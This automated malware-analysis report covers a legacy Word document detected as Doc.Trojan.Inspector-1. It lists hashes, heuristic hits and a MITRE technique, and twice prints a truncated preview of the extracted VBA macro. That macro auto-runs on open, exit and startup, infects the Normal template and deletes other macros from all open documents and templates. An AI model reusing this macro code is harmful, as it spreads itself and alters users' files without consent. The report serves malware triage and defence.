Office (OLE) malware analysis — malicious · c5b2ff6c6f6c212b

MALICIOUS

Office (OLE)

47.5 KB Created: 2001-07-04 06:10:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 7951ac99fce9f8a1d75e0457607f1717 SHA-1: 0c2a0925a2b86faba20400d65b834df4f49d89a0 SHA-256: c5b2ff6c6f6c212b9b95e3e97b3ec00599ae91c8f0dab5ca263df27310ea7109

220 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a legacy Word document containing VBA macros, flagged by multiple high-severity heuristics including OLE_VBA_AUTOOPEN, OLE_VBA_DOCOPEN, and OLE_VBA_AUTOCLOSE. The extracted VBA code, though truncated, appears to be a 'Virus Inspector' designed to detect and potentially delete other macros or code within the document. This suggests the file's primary function is to interfere with or disable security measures within the document itself.

Heuristics 6

ClamAV: Doc.Trojan.Inspector-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Inspector-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32929 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32929 bytes
SHA-256: `f16ff3eaecfa28d60271c0165e08ffbd59df79a4d9d9ad346b43351dfb6b7113`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "VirusInspect" Option Explicit Dim KillCount As Integer Dim sAutoNames As Variant Dim bInited As Boolean Dim LatestVer As Double Dim g_VBCom As Variant Dim DetectedList As New Collection Const Logo As String = "Wu's Macro Virus Inspector " Function Detected(doc As Variant) As Integer Dim i As Integer For i = 1 To DetectedList.count If (doc.Name = Detected List.Item(i)) Then Detected = i Exit Function End If Next Detected = 0 End Function Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean) Dim i As Integer i = Detected(doc) If (f) Then If (i < 1) Then DetectedList.Add (doc.Name) End If Else If (i > 0) Then DetectedList.Remove (i) End If End If End Sub Sub ClearReg() While DetectedList.count > 0 DetectedList.Remove (1) Wend End Sub Sub DeleteCode(cm As Variant, ByVal st, n As Long) KillCount = KillCount + 1 Call cm.DeleteLines(st, n) ShowStatus ("Delete From Line " & st & "to " & st + n) End Sub Sub KillSub(cm As Variant, ByVal Name As String) Dim i, n As Long 'Dim cmd As CodeModule If (Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1)) Then Exit Sub End If On Error GoTo Err i = cm.ProcStartLine(Name, 0) 'vbext_pk_Proc) n = cm.ProcCountLines(Name, 0) ' vbext_pk_Proc) If (InStr(1, cm.Lines(i, 1), "Wu", vbTextCompare) < 1) Then Call DeleteCode(cm, i, n) End If Exit Sub Err: End Sub Sub KillAutoMod(md As Variant) Dim Name As Variant For Each Name In sAutoNames If (InStr(1, md.Name, Name, vbTextCompare) > 0) Then Call KillSub(md, "MAIN") End If Next Name End Sub Sub KillVirus(doc As Variant) 'Document) 'VBProject Dim prj As Variant 'VBProject Dim obj As Variant Dim Name As Variant Dim j, n As Integer Dim md As Variant 'CodeModule Dim VBCom As Variant 'VBComponents Dim count As Integer Dim saved As Boolean Call Init If (Detected(doc)) Then Exit Sub End If saved = doc.saved count = KillCount Set prj = doc.VBProject Set VBCom = prj.VBComponents For j = 1 To VBCom.count Set md = VBCom.Item(j).CodeModule Call KillAutoMod(md) Next j For j = 1 To VBCom.count Set md = VBCom.Item(j).CodeModule ShowStatus "Scanning In " & md.Name For Each Name In sAutoNames Call KillSub(md, Name) Next Name Call KillAutoMod(md) Next j Call SetDetectedFlag(doc, True) ' prj.VBComponents(1).Activate If (KillCount > count) Then ClearReg If (saved) Then Call SafeSave(doc) Else doc.saved = False End If Else If (saved) Then doc.saved = True End If End If End Sub Sub DetectAll() Dim doc As Variant 'Document For Each doc In Documents Call KillVirus(doc) Next For Each doc In Templates Call KillVirus(doc) Next If (KillCount > 0) Then ShowStatus "杀掉 " & KillCount & "个病毒！但未保存" Else ShowStatus "未发现宏病毒！" End If KillCount = 0 End Sub Sub Init() Dim i As Integer Dim obj As Variant If (bInited) Then Exit Sub End If 'MsgBox "Init" sAutoNames = Array("Document_Close", "Document_Open", _ "AutoClose", "AutoOpen", "Document_New", "AutoExec", _ "AutoNew", "AutoExit") Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive) Set obj = Application.NormalTemplate Call InfectTo(obj) KillCount = 0 ClearReg bInited = True End Sub Sub AutoExec() 'Wu's Sub Call DetectAll End Sub Sub AutoExit() 'Wu's Sub Call DetectAll End Sub Sub AutoOpen() 'Wu's Sub Call DetectAll End Sub Sub Au ... (truncated)

SHA-256: f16ff3eaecfa28d60271c0165e08ffbd59df79a4d9d9ad346b43351dfb6b7113

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VirusInspect"
Option Explicit


Dim KillCount As Integer
Dim sAutoNames  As Variant

Dim bInited As Boolean
Dim LatestVer As Double
Dim g_VBCom As Variant
Dim DetectedList As New Collection
Const Logo As String = "Wu's Macro Virus Inspector "



Function Detected(doc As Variant) As Integer
Dim i As Integer
For i = 1 To DetectedList.count
  If (doc.Name = Detected List.Item(i)) Then
    Detected = i
    Exit Function
  End If
Next
    Detected = 0
End Function
Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean)
Dim i As Integer
i = Detected(doc)
If (f) Then
    If (i < 1) Then
        DetectedList.Add (doc.Name)
    End If
Else
    If (i > 0) Then
        DetectedList.Remove (i)
    End If
End If
End Sub
Sub ClearReg()
While DetectedList.count > 0
    DetectedList.Remove (1)
Wend
End Sub



Sub DeleteCode(cm As Variant, ByVal st, n As Long)
KillCount = KillCount + 1
Call cm.DeleteLines(st, n)
ShowStatus ("Delete From Line " & st & "to " & st + n)
End Sub
Sub KillSub(cm As Variant, ByVal Name As String)
Dim i, n As Long
'Dim cmd As CodeModule

  If (Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1)) Then
   Exit Sub
  End If
  On Error GoTo Err
   i = cm.ProcStartLine(Name, 0) 'vbext_pk_Proc)
   n = cm.ProcCountLines(Name, 0) ' vbext_pk_Proc)
    If (InStr(1, cm.Lines(i, 1), "Wu", vbTextCompare) < 1) Then
     Call DeleteCode(cm, i, n)
    End If
    Exit Sub
Err:
End Sub
Sub KillAutoMod(md As Variant)
Dim Name As Variant
        For Each Name In sAutoNames
               If (InStr(1, md.Name, Name, vbTextCompare) > 0) Then
                        Call KillSub(md, "MAIN")
               End If
        Next Name
 
End Sub

Sub KillVirus(doc As Variant) 'Document)
'VBProject
Dim prj As Variant 'VBProject
Dim obj As Variant
Dim Name As Variant
Dim j, n As Integer
Dim md As Variant 'CodeModule
Dim VBCom As Variant 'VBComponents
Dim count As Integer
Dim saved As Boolean

Call Init
If (Detected(doc)) Then
     Exit Sub
End If

 saved = doc.saved
 
    count = KillCount
    Set prj = doc.VBProject
    Set VBCom = prj.VBComponents
    For j = 1 To VBCom.count
     Set md = VBCom.Item(j).CodeModule
        Call KillAutoMod(md)
    Next j
    For j = 1 To VBCom.count
    Set md = VBCom.Item(j).CodeModule
        ShowStatus "Scanning In " & md.Name
        For Each Name In sAutoNames
         Call KillSub(md, Name)
        Next Name
        Call KillAutoMod(md)
    Next j
    
    Call SetDetectedFlag(doc, True)
'    prj.VBComponents(1).Activate
    If (KillCount > count) Then
        ClearReg
        If (saved) Then
            Call SafeSave(doc)
        Else
         doc.saved = False
        End If
    Else
     If (saved) Then
     doc.saved = True
     End If
    End If
 
 End Sub
 
 
 
 
 
Sub DetectAll()

Dim doc As Variant 'Document
For Each doc In Documents
 Call KillVirus(doc)
Next
For Each doc In Templates
 Call KillVirus(doc)
Next
If (KillCount > 0) Then
    ShowStatus "杀掉 " & KillCount & "个病毒！但未保存"
Else
    ShowStatus "未发现宏病毒！"
End If
KillCount = 0
End Sub

 
 
 
  
 
Sub Init()
    Dim i As Integer
    Dim obj As Variant
    
    If (bInited) Then
        Exit Sub
    End If
    'MsgBox "Init"
    sAutoNames = Array("Document_Close", "Document_Open", _
    "AutoClose", "AutoOpen", "Document_New", "AutoExec", _
     "AutoNew", "AutoExit")
    Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive)
    Set obj = Application.NormalTemplate
    Call InfectTo(obj)
    KillCount = 0
    ClearReg
    bInited = True
End Sub
Sub AutoExec() 'Wu's Sub
 Call DetectAll
End Sub
Sub AutoExit() 'Wu's Sub
 Call DetectAll
End Sub
Sub AutoOpen() 'Wu's Sub
 Call DetectAll
End Sub
Sub Au
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.